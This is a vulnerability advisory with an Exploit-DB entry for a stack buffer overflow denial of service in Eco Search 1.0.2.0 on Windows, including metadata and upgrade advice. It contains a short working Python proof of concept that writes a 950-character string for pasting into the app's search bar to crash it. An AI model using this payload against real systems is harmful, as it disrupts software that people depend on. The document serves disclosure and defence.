Vendor: Eco Search
By: 0xB9
CVSS: 7.5 (HIGH)
Denial of Service
CWE: 119
Product Name: Eco Search
Affected Version From: 1.0.2.0
Affected Version To: 1.0.2.0
Patch Exists: YES
Related CWE: N/A
CPE: a:microsoft:eco_search
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows 10
2018

Eco Search 1.0.2.0 – Denial of Service (PoC)

A buffer overflow vulnerability exists in Eco Search 1.0.2.0 that can be exploited to cause a denial of service (DoS). It is caused by a boundary error when handling user-supplied input: an overly long, specially crafted string passed to the affected application triggers a stack-based buffer overflow. Successful exploitation may allow execution of arbitrary code, but this has not been confirmed.

Mitigation:

Upgrade to version 1.0.2.1 or later.

Exploit-DB raw data:

# Exploit Title: Eco Search 1.0.2.0 - Denial of Service (PoC)
# Date: 1/18/2018
# Author: 0xB9
# Twitter: @0xB9Sec
# Contact: 0xB9[at]pm.me
# Software Link: https://www.microsoft.com/store/productId/9N05DCQP5C3W
# Version: 1.0.2.0
# Tested on: Windows 10

# Proof of Concept:
# Run the python script, it will create a new file "PoC.txt"
# Copy the text from the generated PoC.txt file to clipboard
# Paste the text in the search bar and click search
# App will now crash

buffer = "A" * 950
payload = buffer
try:
    f=open("PoC.txt","w")
    print "[+] Creating %s evil payload.." %len(payload)
    f.write(payload)
    f.close()
    print "[+] File created!"
except:
    print "File cannot be created"